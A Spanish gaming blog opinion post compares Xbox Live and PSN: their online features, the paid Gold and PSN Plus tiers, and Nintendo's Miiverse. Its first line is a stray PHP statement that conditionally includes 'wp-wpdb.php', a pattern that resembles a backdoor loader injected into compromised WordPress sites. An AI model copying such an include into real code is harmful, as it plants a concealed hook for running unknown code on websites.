if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Xbox Live VS PSN, dos servicios diferentes – La Fortaleza de LeChuck

Xbox Live VS PSN, dos servicios diferentes

A lo largo de la generación las dos plataformas online más importantes han evolucionado constantemente. Como sabéis Xbox Live partía con ventaja naciendo en la primera Xbox, y ya dando multitud de opciones propias de los jugadores de PC, y de forma mucho más sencilla. No solo el propio juego multijugador Online, también el chat de voz durante el juego que mejoraba especialmente la experiencia (Eso sí, solo existiendo la modalidad de pago de Xbox Live Gold). Mientras tanto, PSN, nacido como un servicio gratuito de juego online, aún con menos opciones y menos integración en los juegos, también ha sabido crecer de un modo que les permitiese sacar nuevas funcionalidades y recompensas, con otro servicio de pago llamado PSN Plus. Comentemos un poco sus diferencias, virtudes y cosas a mejorar.

Xbox Live

Como os comentaba, Xbox Live nació junto a la primera Xbox de Microsoft, con una idea de ser la consola más «pecera» trayendo muchas posibilidades y juegos del mundo del PC a consola (Por poner un ejemplo, los shooters comenzaron a llevarse bien con las consolas de dos sticks, a partir de Xbox, que tanto con Halo como toda una retaíla de FPS de gran calidad (Counter Strike Source, Rainbow Six, Ghost Recon…) consiguieron lo impensable, que la gente se acostumbrara y viera la facilidad de jugar a un FPS con un mando, con tus amigos desde sus casas, pudiendo conversar durante el juego. Llevaba e integraba en la videoconsola lo que hasta hoy en los juegos de PC se sigue haciendo mayoritariamente a través de programas externos. Toda una revolución.

Además del chat de voz, fueron instaurando nuevas opciones muy interesantes. Llegaron los mensajes de texto, los mensajes de voz, las «partys» donde unos cuántos pueden hablar a la vez aún jugandoa juegos diferentes, la tienda de Xbox Live, avatares, evolución constante de la interfaz, los DLC(que ya comenzaron la generación pasada en la propia Xbox, con multitud de juegos con mapas descargables), los logros, la posibilidad de instalar aplicaciones en la interfaz de Xbox, etc. Todo ello afianzaron la consola en todo lo que rodea los juegos online, y obviamente hoy en día todos los juegos que se basan en ese modo suelen tener su versión más fiable en la consola de Microsoft.

Playstation Network

PSN siempre fue un sistema mucho más «humilde». Hasta llegar Playstation 3, Sony no se tomó muy en serio las posibilidades Online y aún así, tampoco aumentó mucho la calidad del mismo, queriendo mantener la gratuidad del sistema. La poca integración no daba un sistema muy bueno, y aunque sus usuarios siempre han apreciado y defendido que es gratuito, muchos de nosotros hemos preferido pagar y que lo mejoraran. En todo caso, su lucha no ha estado en la calidad del juego Online, pero si han sabido atacar por la vía de los servicios. Ya integran también muchas posibilidades como el «fracaso» de Home y sus distintas actualizaciones con tematizaciones, los trofeos, la tienda Online, etc, pero donde han dado un gran valor a PS3 es en uno de sus últimos servicios, PSN Plus

PSN Plus nació como un servicio de suscripción como Xbox Live Gold, que se distinguía más que por las opciones online, con sus descuentos exclusivos en contenidos de pago como mapas, juegos, DLCs en general. En todo caso, desde hace unos meses está otorgando un plus de valor que recomiendo a todos los usuarios de Playstation 3, y es la posibilidad de descargar de forma gratuita, un montón de los mejores juegos del catálogo de la consola, con la única pega de tener que seguir siendo suscriptor de PSN Plus para jugarlos.

Conclusión y futuro

Son dos formas de ver los servicios online, y lo mejor sería que aprendieran una de la otra los defectos y virtudes, para que las consolas un día sean las principales plataformas para jugar en linea. Todavía parece lejano que los juegos del género online por excelencia, el MMORPG, salgan en consola (Y a este paso nunca tendremos una Oasis) . De momento Xbox Live acaba de sacar el servicio Xbox Live Rewards con el que quiere premiar a los usuarios que compren suscripciones de Xbox Live o inviten a sus amigos al servicio. Tiempo venía rumoreandose un sistema de recompensas, y todos soñábamos con que fueran recompensas a través de los logros y no a través de las compras, pero todo «regalo» que hagan si no te lo sacan de otro sitio, es bienvenido. Por parte de PSN Plus, han realizado ofertas para comprar la suscripción de PSN Plus por debajo incluso de los 40€, valiendo normalmente sobre los 50€, otro método de fidelizar a sus usuarios y mejorar el sistema.

Por su lado Nintendo, después del fracaso y paso sin pena ni gloria de sus servicios y especialmente hypeado WiiConnect24h, se volverá a intentar desmarcar con su «Miiverse» que parece centrarse más en la comunidad ylas posibilidades de interacción fuera de los juegos que en el propio juego online. Todos esperamos que Nintendo diga lo contrario, veremos como queda con la salida de Wii U.

Publicada el
Categorizado como Opinión

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

Dejar un comentario